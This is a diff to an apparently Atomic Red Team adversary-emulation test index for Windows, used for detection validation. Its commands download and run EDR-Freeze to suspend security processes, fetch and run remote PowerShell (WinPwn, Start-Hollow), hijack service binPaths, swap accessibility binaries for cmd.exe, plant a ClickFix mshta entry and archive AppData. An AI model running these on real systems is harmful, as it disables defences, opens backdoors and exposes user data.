+        and temporarily freeze PPL-protected processes for analysis or testing purposes.
+      supported_platforms:
+      - windows
+      input_arguments:
+        processName:
+          type: string
+          default: SecurityHealthService
+          description: PPL-protected process name to target
+      executor:
+        command: "# Enable SeDebugPrivilege\nAdd-Type -TypeDefinition @\"\nusing System;\nusing
+          System.Runtime.InteropServices;\n\npublic class TokenAdjuster {\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool OpenProcessToken(IntPtr
+          ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);\n\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool LookupPrivilegeValue(string
+          lpSystemName, string lpName, out long lpLuid);\n\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool AdjustTokenPrivileges(IntPtr
+          TokenHandle, bool DisableAllPrivileges,\n        ref TOKEN_PRIVILEGES NewState,
+          uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);\n\n    [StructLayout(LayoutKind.Sequential,
+          Pack = 1)]\n    public struct TOKEN_PRIVILEGES {\n        public int PrivilegeCount;\n
+          \       public long Luid;\n        public int Attributes;\n    }\n\n    public
+          const int SE_PRIVILEGE_ENABLED = 0x00000002;\n    public const uint TOKEN_ADJUST_PRIVILEGES
+          = 0x0020;\n    public const uint TOKEN_QUERY = 0x0008;\n\n    public static
+          bool EnableSeDebugPrivilege() {\n        IntPtr hToken;\n        if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle,
+          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))\n            return
+          false;\n\n        long luid;\n        if (!LookupPrivilegeValue(null, \"SeDebugPrivilege\",
+          out luid))\n            return false;\n\n        TOKEN_PRIVILEGES tp = new
+          TOKEN_PRIVILEGES();\n        tp.PrivilegeCount = 1;\n        tp.Luid = luid;\n
+          \       tp.Attributes = SE_PRIVILEGE_ENABLED;\n\n        return AdjustTokenPrivileges(hToken,
+          false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);\n    }\n}\n\"@\n\n$result =
+          [TokenAdjuster]::EnableSeDebugPrivilege()\nif ($result) {\n    Write-Host
+          \"SeDebugPrivilege enabled successfully.\" -ForegroundColor Green\n} else
+          {\n    Write-Host \"Failed to enable SeDebugPrivilege.\" -ForegroundColor
+          Red\n    exit 1\n}\n\n# Get basic process info\n$process = Get-Process -Name
+          $#{processName} -ErrorAction Stop\n$processName = $process.ProcessName\nWrite-Host
+          \"Process Name: $processName)\"\nWrite-Host \"PID: $($process.Id)\"\n        \n#
+          Get executable path and user info\n$query = \"SELECT * FROM Win32_Process
+          WHERE Name = '$processName.exe'\"\n$wmiProcess = Get-WmiObject -Query $query\n\n$owner
+          = $wmiProcess.GetOwner()\n    Write-Host \"User: $($owner.Domain)\\$($owner.User)\"\n\n\n#
+          Get the folder of the current script\n$scriptFolder = Split-Path -Parent
+          $MyInvocation.MyCommand.Definition\n\n# Download latest EDR-Freeze package
+          and extract (force replace)\n$downloadUrl = \"https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip\"\n$zipPath
+          = Join-Path $scriptFolder \"EDR-Freeze_1.0.zip\"\nWrite-Host \"Downloading
+          latest EDR-Freeze from $downloadUrl\" -ForegroundColor Cyan\ntry {\n    Invoke-WebRequest
+          -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop\n
+          \   Write-Host \"Download completed: $zipPath\" -ForegroundColor Green\n
+          \   $extractFolder = $scriptFolder\n    if (Test-Path $zipPath) {\n        Write-Host
+          \"Extracting archive to $extractFolder (overwriting existing files)\" -ForegroundColor
+          Cyan\n        if (Test-Path $extractFolder) {\n            # Ensure target
+          exe not locked; attempt to stop any running instance silently\n            Get-Process
+          -Name \"EDR-Freeze_1.0\" -ErrorAction SilentlyContinue | Stop-Process -Force
+          -ErrorAction SilentlyContinue\n        }\n        Add-Type -AssemblyName
+          System.IO.Compression.FileSystem 2>$null\n        # Custom extraction routine
+          (overwrite existing) compatible with .NET Framework (no bool overwrite overload)\n
+          \       $archive = $null\n        try {\n            $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)\n
+          \           foreach ($entry in $archive.Entries) {\n                if ([string]::IsNullOrWhiteSpace($entry.FullName))
+          { continue }\n                if ($entry.FullName.EndsWith('/')) { # directory
+          entry\n                    $dirPath = Join-Path $extractFolder $entry.FullName\n
+          \                   if (-not (Test-Path $dirPath)) { New-Item -ItemType
+          Directory -Path $dirPath -Force | Out-Null }\n                    continue\n
+          \               }\n                $destPath = Join-Path $extractFolder
+          $entry.FullName\n                $destDir = Split-Path $destPath -Parent\n
+          \               if (-not (Test-Path $destDir)) { New-Item -ItemType Directory
+          -Path $destDir -Force | Out-Null }\n                if (Test-Path $destPath)
+          { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }\n                try
+          {\n                    # Use static extension method (PowerShell 5.1 compatible)\n
+          \                   [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry,
+          $destPath, $false)\n                } catch {\n                    Write-Host
+          \"Failed to extract entry $($entry.FullName): $_\" -ForegroundColor Yellow\n
+          \               }\n            }\n            Write-Host \"Extraction completed.\"
+          -ForegroundColor Green\n        } finally {\n            if ($archive) {
+          $archive.Dispose() }\n        }\n    }\n} catch {\n    Write-Host \"Failed
+          to download or extract EDR-Freeze: $_\" -ForegroundColor Red\n}\n\n# Wait
+          15s before putting targeted process before putting it in the comma\nWrite-Host
+          \"Waiting 15s before putting $processName in the comma\" -ForegroundColor
+          Yellow\nStart-Sleep -Seconds 5\nWrite-Host \"Waiting 10s before putting
+          $processName in the comma\" -ForegroundColor Yellow\nStart-Sleep -Seconds
+          5\nWrite-Host \"Waiting 5s before putting $processName in the comma\" -ForegroundColor
+          Yellow\nStart-Sleep -Seconds 3\nWrite-Host \"Waiting 2s before putting $processName
+          in the comma\" -ForegroundColor Yellow\nStart-Sleep -Seconds 2\n\n# Put
+          targeted  process in the comma for 15s\n# Discover the EDR-Freeze executable
+          dynamically (pick most recent if multiple)\n$edrFreezeExeName = Get-ChildItem
+          -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue
+          |\n    Sort-Object LastWriteTime -Descending |\n    Select-Object -First
+          1 -ExpandProperty Name\nif (-not $edrFreezeExeName) {\n    Write-Host \"No
+          EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder\" -ForegroundColor
+          Red\n    exit 1\n}\n\n$edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName\nWrite-Host
+          \"Using EDR-Freeze executable: $edrFreezeExeName\" -ForegroundColor Cyan\nWrite-Host
+          \"$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)\"
+          -ForegroundColor Yellow\nStart-Process -FilePath $edrFreezeExe -ArgumentList
+          (\"$($process.Id) 15000\") | Out-Null"
+        cleanup_command: |-
+          Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
+          Write-Output "File deleted: $edrFreezeExe"
+        name: powershell
+        elevation_required: true
  T1601:
    technique:
      type: attack-pattern
@@ -19697,6 +19937,14 @@ defense-evasion:
      supported_platforms:
      - windows
      input_arguments:
+        script_download_url:
+          description: Download url for Start-Hollow.ps1
+          type: string
+          default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
+        script_path:
+          description: Path to Start-Hollow.ps1
+          type: path
+          default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
        hollow_binary_path:
          description: Path of the binary to hollow (executable that will run inside
            the sponsor)
@@ -19716,7 +19964,7 @@ defense-evasion:
          default: notepad
      executor:
        command: |
-          . "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
+          . "#{script_path}"
          $ppid=Get-Process #{parent_process_name} | select -expand id
          Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
        cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
@@ -19724,6 +19972,21 @@ defense-evasion:

          '
        name: powershell
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Start-Hollow.ps1 must be installed
+
+          '
+        prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          try {
+            iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
+          } catch {
+            Write-Error $_
+            Exit 1
+          }
    - name: RunPE via VBA
      auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
      description: 'This module executes notepad.exe from within the WINWORD.EXE process
@@ -19809,7 +20072,7 @@ defense-evasion:
          -program "#{hollow_binary_path}" -debug

          '
-        cleanup_command: |-
+        cleanup_command: |
          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
  T1564.009:
@@ -26105,7 +26368,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -26182,7 +26445,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -30556,14 +30818,25 @@ privilege-escalation:
        Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn.
      supported_platforms:
      - windows
+      input_arguments:
+        service_name:
+          description: The name of the service that will be modified
+          type: string
+          default: Fax
+        service_binpath:
+          description: The default value for the binary path of the service
+          type: string
+          default: C:\WINDOWS\system32\fxssvc.exe
      executor:
        name: command_prompt
        elevation_required: true
        command: |
-          sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
-          sc start Fax
-        cleanup_command: sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul
-          2>&1
+          sc config #{service_name} binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
+          sc start #{service_name}
+        cleanup_command: 'sc config #{service_name} binPath= "#{service_binpath}"
+          >nul 2>&1
+
+          '
    - name: Service Installation CMD
      auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6
      description: |
@@ -34829,6 +35102,47 @@ privilege-escalation:
          '
        name: command_prompt
        elevation_required: true
+    - name: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe
+      auto_generated_guid: 825ba8ca-71cc-436b-b1dd-ea0d5e109086
+      description: 'Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe.
+        This allows the user to launch an elevated command prompt by pressing the
+        Windows Key + P on the login screen.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\DisplaySwitch_backup.exe (copy C:\Windows\System32\DisplaySwitch.exe C:\Windows\System32\DisplaySwitch_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\DisplaySwitch.exe /A
+          icacls C:\Windows\System32\DisplaySwitch.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\DisplaySwitch.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\DisplaySwitch.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
+    - name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
+      auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
+      description: 'Replace AtBroker.exe (App Switcher binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt from the login screen
+        by locking and then unlocking the computer after toggling on any of the accessibility
+        tools in the Accessibility menu.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\AtBroker.exe /A
+          icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1055.004:
    technique:
      type: attack-pattern
@@ -37022,6 +37336,9 @@ privilege-escalation:
          default: C:\Windows\System32\calc.exe
      executor:
        command: |
+          if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer")){
+            New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          }
          if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
            New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
          }
@@ -38400,6 +38717,14 @@ privilege-escalation:
      supported_platforms:
      - windows
      input_arguments:
+        script_download_url:
+          description: Download url for Start-Hollow.ps1
+          type: string
+          default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
+        script_path:
+          description: Path to Start-Hollow.ps1
+          type: path
+          default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
        hollow_binary_path:
          description: Path of the binary to hollow (executable that will run inside
            the sponsor)
@@ -38419,7 +38744,7 @@ privilege-escalation:
          default: notepad
      executor:
        command: |
-          . "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
+          . "#{script_path}"
          $ppid=Get-Process #{parent_process_name} | select -expand id
          Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
        cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
@@ -38427,6 +38752,21 @@ privilege-escalation:

          '
        name: powershell
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Start-Hollow.ps1 must be installed
+
+          '
+        prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          try {
+            iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
+          } catch {
+            Write-Error $_
+            Exit 1
+          }
    - name: RunPE via VBA
      auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
      description: 'This module executes notepad.exe from within the WINWORD.EXE process
@@ -38512,7 +38852,7 @@ privilege-escalation:
          -program "#{hollow_binary_path}" -debug

          '
-        cleanup_command: |-
+        cleanup_command: |
          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
  T1068:
@@ -44260,6 +44600,21 @@ execution:
        cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security"
          /v "VBAWarnings" /f
        name: powershell
+    - name: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell
+      auto_generated_guid: 3f3120f0-7e50-4be2-88ae-54c61230cb9f
+      description: |
+        Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches `mshta.exe` with a remote payload.
+        This technique relies on user interaction (Win+R + Enter) to trigger execution.
+        Used in social engineering campaigns that aim to bypass traditional startup methods.
+        Reference: https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
+      supported_platforms:
+      - windows
+      executor:
+        command: Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
+          -Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'
+        cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
+          -Name "atomictest" -ErrorAction SilentlyContinue
+        name: powershell
  T1053.003:
    technique:
      type: attack-pattern
@@ -50394,14 +50749,25 @@ persistence:
        Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn.
      supported_platforms:
      - windows
+      input_arguments:
+        service_name:
+          description: The name of the service that will be modified
+          type: string
+          default: Fax
+        service_binpath:
+          description: The default value for the binary path of the service
+          type: string
+          default: C:\WINDOWS\system32\fxssvc.exe
      executor:
        name: command_prompt
        elevation_required: true
        command: |
-          sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
-          sc start Fax
-        cleanup_command: sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul
-          2>&1
+          sc config #{service_name} binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
+          sc start #{service_name}
+        cleanup_command: 'sc config #{service_name} binPath= "#{service_binpath}"
+          >nul 2>&1
+
+          '
    - name: Service Installation CMD
      auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6
      description: |
@@ -56841,6 +57207,47 @@ persistence:
          '
        name: command_prompt
        elevation_required: true
+    - name: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe
+      auto_generated_guid: 825ba8ca-71cc-436b-b1dd-ea0d5e109086
+      description: 'Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe.
+        This allows the user to launch an elevated command prompt by pressing the
+        Windows Key + P on the login screen.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\DisplaySwitch_backup.exe (copy C:\Windows\System32\DisplaySwitch.exe C:\Windows\System32\DisplaySwitch_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\DisplaySwitch.exe /A
+          icacls C:\Windows\System32\DisplaySwitch.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\DisplaySwitch.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\DisplaySwitch.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
+    - name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
+      auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
+      description: 'Replace AtBroker.exe (App Switcher binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt from the login screen
+        by locking and then unlocking the computer after toggling on any of the accessibility
+        tools in the Accessibility menu.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\AtBroker.exe /A
+          icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1136.002:
    technique:
      type: attack-pattern
@@ -58807,6 +59214,9 @@ persistence:
          default: C:\Windows\System32\calc.exe
      executor:
        command: |
+          if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer")){
+            New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          }
          if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
            New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
          }
@@ -70119,6 +70529,54 @@ collection:
        cleanup_command: 'del #{output_file}

          '
+    - name: Copy and Compress AppData Folder
+      auto_generated_guid: 05e8942e-f04f-460a-b560-f7781257feec
+      description: 'Copies the AppData folder, compresses it, and cleans up temporary
+        files.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        destination_folder:
+          type: Path
+          default: "$env:USERPROFILE\\Desktop\\AppDataCopy"
+          description: Temporary copy location
+        zip_file_path:
+          type: Path
+          default: "$env:USERPROFILE\\Desktop\\AppDataBackup.zip"
+          description: ZIP archive path
+      dependencies:
+      - description: Requires admin and .NET compression libraries
+        prereq_command: |
+          if (-not ([Security.Principal.WindowsPrincipal] `
+              [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(`
+              [Security.Principal.WindowsBuiltInRole]::Administrator)) { exit 1 }
+          if (-not (Test-Path "$env:USERPROFILE\AppData")) { exit 1 }
+        get_prereq_command: 'Run PowerShell as Administrator and ensure .NET compression
+          assemblies are available.
+
+          '
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $AppData="$env:USERPROFILE\AppData"
+          $Copy="#{destination_folder}"
+          $Zip="#{zip_file_path}"
+
+          if (Test-Path $Copy) { Remove-Item $Copy -Recurse -Force }
+          New-Item -ItemType Directory -Path $Copy | Out-Null
+
+          Get-ChildItem $AppData -Recurse -Force | ForEach-Object {
+            $rel = $_.FullName.Substring($AppData.Length + 1)
+            $dest = Join-Path $Copy $rel
+            if ($_.PSIsContainer) { New-Item -ItemType Directory -Path $dest -Force | Out-Null }
+            else { Copy-Item $_.FullName -Destination $dest -Force -ErrorAction SilentlyContinue }
+          }
+
+          Add-Type -AssemblyName System.IO.Compression.FileSystem
+          [System.IO.Compression.ZipFile]::CreateFromDirectory($Copy, $Zip, [System.IO.Compression.CompressionLevel]::Optimal, $false)
  T1113:
    technique:
      type: attack-pattern
@@ -70622,13 +71080,22 @@ collection:
    atomic_tests:
    - name: using device audio capture commandlet
      auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95
-      description: "[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)\n"
+      description: |
+        Uses AudioDeviceCmdlets to set the default recording device and simulate audio capture.
+        Module repo: [AudioDeviceCmdlets](https://github.com/frgnca/AudioDeviceCmdlets)
      supported_platforms:
      - windows
+      dependencies:
+      - description: AudioDeviceCmdlets module must be installed
+        prereq_command: "if (Get-Module -ListAvailable -Name AudioDeviceCmdlets) {
+          exit 0 } else { exit 1 } \n"
+        get_prereq_command: "Install with: Install-Module -Name AudioDeviceCmdlets
+          -Force\" \n"
      executor:
-        command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
-
-          '
+        command: |
+          $mic = Get-AudioDevice -Recording
+          Set-AudioDevice -ID $mic.ID
+          Start-Sleep -Seconds 5
        name: powershell
    - name: Registry artefact when application use microphone
      auto_generated_guid: 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a
@@ -75854,7 +76321,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -75931,7 +76398,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -83336,7 +83802,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -83372,6 +83838,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -86756,10 +87223,10 @@ discovery:
      - windows
      executor:
        command: |
-          net groups "Account Operators" /doma
-          net groups "Exchange Organization Management" /doma
-          net group "BUILTIN\Backup Operators" /doma
-          net group /domai "Domain Admins"
+          net groups "Account Operators" /domain
+          net groups "Exchange Organization Management" /domain
+          net group "BUILTIN\Backup Operators" /domain
+          net group "Domain Admins" /domain
        name: command_prompt
    - name: Find machines where user has local admin access (PowerView)
      auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1
@@ -87847,6 +88314,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          winPEAS -noninteractive -consoleoutput
        name: powershell
@@ -87858,6 +88326,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          itm4nprivesc -noninteractive -consoleoutput
        name: powershell
@@ -87868,6 +88337,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          oldchecks -noninteractive -consoleoutput
        cleanup_command: |-
@@ -87884,6 +88354,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          otherchecks -noninteractive -consoleoutput
        name: powershell
@@ -87895,6 +88366,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          Generalrecon -consoleoutput -noninteractive
        name: powershell
@@ -87906,6 +88378,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          Morerecon -noninteractive -consoleoutput
        name: powershell
@@ -87917,6 +88390,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          RBCD-Check -consoleoutput -noninteractive
        name: powershell
@@ -87928,6 +88402,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
          Invoke-watson
        name: powershell
@@ -87939,6 +88414,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
          Invoke-SharpUp -command "audit"
        name: powershell
@@ -87952,6 +88428,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
          Invoke-Seatbelt -Command "-group=all"
        name: powershell
@@ -99371,6 +99848,84 @@ impact:
          '
        name: command_prompt
        elevation_required: false
+    - name: Windows - Display a simulated ransom note via Notepad (non-destructive)
+      auto_generated_guid: 0eeb68ce-e64c-4420-8d53-ad5bdc6f86d5
+      description: |
+        Creates a temporary ransom-note text file and opens it in Notepad to
+        simulate ransomware "note display" behavior without making destructive
+        changes. SAFE and non-destructive.
+      supported_platforms:
+      - windows
+      input_arguments:
+        note_filename:
+          description: File name for the simulated ransom note
+          type: string
+          default: ART-T1491-ransom-note.txt
+        pid_filename:
+          description: File name for storing Notepad PID
+          type: string
+          default: ART-T1491-notepad.pid
+        note_title:
+          description: Title at the top of the ransom note
+          type: string
+          default: "!!! READ_ME_NOW !!!"
+        note_body:
+          description: The body of the ransom note (plain text)
+          type: string
+          default: |
+            Your files are SAFE. This is a TEST note for detection validation
+            by bak3n3k0. No data has been encrypted. This simulation exercises
+            detections for:
